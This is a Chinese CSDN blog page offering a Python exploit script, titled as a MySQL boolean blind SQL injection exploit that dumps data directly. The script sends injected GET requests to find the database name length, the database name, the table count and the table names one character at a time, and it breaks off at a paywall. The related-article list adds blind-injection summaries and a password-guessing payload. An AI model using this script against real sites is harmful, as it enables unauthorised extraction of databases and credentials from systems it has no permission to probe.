mysql布尔盲注exp直接爆数据

最新推荐文章于 2023-09-21 12:46:39 发布
VIP文章 最新推荐文章于 2023-09-21 12:46:39 发布
阅读量539 收藏
点赞数
分类专栏: exp 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haha13l4/article/details/94356571
版权 
import requests
import re
#作者:wf
#当前网站的数据库长度
def database_len():
    for i in range(30):
        database_len_url=f"{main_url}' and length(database())={i}--+"
        print(database_len_url)
        html=requests.get(database_len_url).text
        if(re.findall(zz,html)):
            return i
            break
#当前网站的数据库名
def database(database_len):            
    data=''            
    database_len=database_len+1
    for i in range(1,int(database_len)):
        for key in fuzz:
            payload_database=f"{main_url}' and substr((select database()),{i},1)='{key}'--+"
            print(payload_database)
            html=requests.get(payload_database).text
            if(re.findall(zz,html)):
                #print(key)
                data=data+key 
    return data  

#当前网站的表名的数量
def table_num():
    for i in range(100):
        table_num_url=f"{main_url}' and (select count(table_name) from information_schema.tables where table_schema='{database}')='{i}'--+"
        print(table_num_url)
        html=requests.get(table_num_url).text
        if(re.findall(zz,html)):
            return i
            break

#当前网站的每个表名的长度
def table_len_num():
    z=0
    len=[]
    for i in range(table_num):    
        for j in range(100):
            table_len_url=f"{main_url}' and length(substr((select table_name from information_schema.tables where table_schema='{database}' limit {i},1),1))={j}--+"
            print(table_len_url)
            html=requests.get(table_len_url).text
            if(re.findall(zz,html)):
                len.append([z,j])
                z+=1
                break
    return len


#当前数据库的所有表名称
def table():
    tablelist=[]
    for i in table_len_num:      #表长度
        table=''
        bool2=False
        while 1:
            bool1=False
            for j in range(1,i[1]+1):    #i[0]  1 2 3 4   i[1] 6  8  7  5
                for key in fuzz:
                    payload_table=f"{main_url}' and substr((select table_name from information_schema.tables where table_schema='{database}' limit {i[0]},1),{j},1)='{key}'--+ "
                    print(payload_table)
                    html=requests.get(payload_table).text
                    if(re.findall(zz,html)):
最低0.47元/天 解锁文章
haha13l4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql-blind(高级盲注+基于布尔).docx
01-23
布尔,错误[实际遇到的非常少]的盲注,不过我们今天暂时只针对布尔盲注做详细说明,关于其它的技巧,后续还会再单独说明,其实,也算不上什么很高级的技巧,都是一些很基础的堆砌,废话不多说,最好的办法还是直接通过实战...
sql注入知识---布尔盲注
尘玥的故事
04-08 471
一般的情况下我们面对这种盲注都是写脚本跑(提前准备然后更具具体的情况再改脚本)表现:会对你的输出进行显示正确错误,但不会报错。通过返回的正确与否来判断数据库的每个字母。
MySQL布尔盲注
一个普普通通的博客
03-01 1392
Mysql注入—布尔盲注
渗透测试-SQL注入之布尔盲注和时间盲注
lza20001103的博客
04-20 2541
渗透测试-SQL注入之布尔盲注和时间盲注
MySQL布尔盲注
fdhdgsdfdsa的博客
03-11 239
盲注是注入的一种方式,是在页面只返回true和false时使用。 需要准备PHP知识 Length()函数 返回字符串的长度 Substr()截取字符串 Ascii()返回字符的ascii码 sleep(n):将程序挂起一段时间 n为n秒 if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句 以上每个函数都可使用,但有可能被禁用,可选其他函数测试 一、判断是否存在盲注 可能需要闭合及注释操作,此处未演示 03.php?id=1 and 1=1
SQL注入学习——sqli-labs闯关(Basic Challenges)
未完成的歌~的博客
07-28 2595
今天开始学习 SQL 注入的相关知识,通过 sqli-labs 靶场来练习。靶场地址SQL注入(SQL Injection)是一种常见的 Web 安全漏洞,攻击者通过构造SQL语句与后台数据库进行交互,达到获取或修改一些敏感数据,或者利用潜在的数据库漏洞进行攻击的目的。何为盲注盲注就是在 sql 注入过程中,sql 语句执行后,查询的数据不能回显到前端页面上。此时,我们需要利用一些特殊的方法来得到数据,这个过程称之为盲注盲注主要分为三类:基于布尔SQL 盲注基于时间的 SQL 盲注。........
关于MySQL数据迁移--data目录直接替换注意事项的详解
09-10
本篇文章是对关于MySQL数据迁移--data目录直接替换的注意事项进行了详细的分析介绍,需要的朋友参考下
mysql数据直接生成word文档数据字典
12-27
mysql数据直接生成word文档数据字典,只需修改账号密码等信息,导入idea后可以直接使用,不需要其他条件
MySQL30W测试数据
09-17
MySQL30W测试数据 MySQL30W测试数据 MySQL30W测试数据 MySQL30W测试数据
JDBC对MySQL数据布尔字段的操作方法
09-03
主要介绍了JDBC对MySQL数据布尔字段的操作方法,实例分析了JDBC操作mysql布尔字段的原理与实现技巧,需要的朋友可以参考下
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
sqlmap)【sqli-labs8-10】盲注布尔盲注、时间盲注
07-06 3300
sqlmap-跑盲注靶场】
Python之路 | 布尔盲注、延时EXP编写
IerkeU的博客
03-29 847
什么是POC、EXP、payload? 答: ​ POC: ​ 全称为‘Proof of concept’,意为概念验证,常指为一段漏洞的证明代码 ​ 理解为:发现可能存在的漏洞后,强调对漏洞是否存在进行验证 ​ EXP: ​ 全称为‘Exploit’,意为利用,指利用系统漏洞进行攻击的动作 ​ 理解为:对已存在的漏洞进行利用,强调利用已有的资源 ​ Payload: ​ 意为有效载荷,指成功exploit之后,真正在目标系统执行的代码或指令 ​ 理解为例如使用了一条恶意SQL语句,使网站出现报
渗透测试常用术语总结
xv66666的博客
07-02 2129
想象自己是一个特工,你的目标是监控一个重要的人,有一天你怀疑目标家里的窗子可能没有关,于是你上前推了推,结果推开了,这是一个POC。之后你回去了,开始准备第二天的渗透计划,第二天你通过同样的漏洞渗透进了它家,仔细查看了所有的重要文件,离开时还安装了一个隐蔽的录音笔,这一天你所做的就是一个EXP,你在他家所做的就是不同的Payload,就把录音笔当作Shellcode吧!
浅谈布尔盲注(sqli-labs less-8)
sxy1_的博客
09-21 110
substr(str,num1,num2) 这个函数用于截取字符串中的字符,"str"是一串字符串,"num1"是字符串中被截取的位置,“num2”是截取字符的个数 ,所以substr((select database()),1,1) 是截取数据库库名的第一个字符;这两天一直在做布尔盲注的题(例:sqli-labs less-8),快吐了,一个一个试字符太麻烦,在网上找了好几个布尔盲注的脚本,都大同小异,研究了一下,自己写了一个脚本,勉强能用。column 字段 column_name 字段名。
使用burpsuite进行布尔盲注(sqli-labs第7关)
J14N的博客
01-30 1042
sqli-labs less-7使用burpsuite布尔盲注(纯小白,刚接触sql注入,有更好的办法欢迎评论区留言)
渗透测试常用术语总结——(1)
dexi1113的博客
06-12 435
渗透测试的常用属于总结大全(1)
布尔盲注怎么用,一看你就明白了。布尔盲注原理+步骤+实战教程
热门推荐
wangyuxiang946的博客
03-16 2万+
写给每一个为了让自己变得更好,而坚持努力的你。
mysql数据库的布尔盲注_mysql注入-布尔盲注总结
weixin_28956075的博客
02-05 540
mysql布尔盲注总结布尔盲注常用函数:length()字符串长度判断left(a,b)从左侧截取a的前b位substr(a,b,c)从b位置开始,截取字符串a的c长度。ascii()将某个字符转换成相应的ascii码值。mid(a,b,c)从位置b开始,截取a字符串的c位ord函数与ascii()函数类似,将某个字符转换成相应的ascii码值。regrexp正则注入limit使用方法:limi...
mysql手工布尔盲注
最新发布
10-13
布尔盲注是一种常见的SQL注入攻击方式,可以通过构造特定的SQL语句来获取数据库中的敏感信息。手工布尔盲注是指通过手动构造SQL语句来进行盲注攻击,而非使用自动化工具。 在MySQL中,可以使用IF函数来进行布尔盲注攻击。IF函数的语法如下: IF(expr1,expr2,expr3) 如果expr1为真,则返回expr2,否则返回expr3。 例如,假设我们要获取数据库中名为“admin”的用户的密码,可以使用如下语句进行布尔盲注攻击: SELECT IF((SELECT password FROM users WHERE username='admin')='123456', 'true', 'false') 如果返回结果为“true”,则说明密码为“123456”,否则密码不是“123456”。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值